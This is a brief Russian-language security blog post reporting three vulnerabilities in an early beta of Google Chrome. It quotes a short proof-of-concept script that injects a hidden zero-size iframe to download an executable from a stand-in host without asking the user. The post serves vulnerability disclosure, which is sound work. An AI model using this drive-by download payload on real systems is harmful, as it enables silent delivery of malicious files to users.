Очередная уязвимость в Google Chrome Browser

Очередная уязвимость в Google Chrome Browser
Ажиотаж вокруг нового браузера от компании Google не спадает. Вчера Google анонсировала первую beta версию своего браузера, а сегодня уже есть 3 уязвимости :)

Первая, о которой я писал раньше , позволяет удаленному пользователю аварийно завершить работу браузера.

Вторая уязвимость, которую описал Авив Рафф , позволяет злоумышленнику выполнить произвольный файл на системе.

И третья, PoC код к которой был только что опубликован на секлабе , позволяет злоумышленнику без уведомления пользователя загрузить произвольный исполняемый файл на систему в каталог, где сохраняются по умолчанию все загружаемые файлы.
PoC код:

<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

Ну что же, как вы видите, ошибки весьма примитивны для современного поколения браузеров. Будем надеяться, что выход официальной версии Google Chrome не будет сопровождаться таким же количеством уведомлений в первые два дня релиза :)
Security
Alt text
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.
Ищем уязвимости в системе и новых подписчиков!

Первое — находим постоянно, второе — ждем вас

Эксплойтните кнопку подписки прямо сейчас

Валерий Марчук

Блог посвящен безопасности и жизни секлаба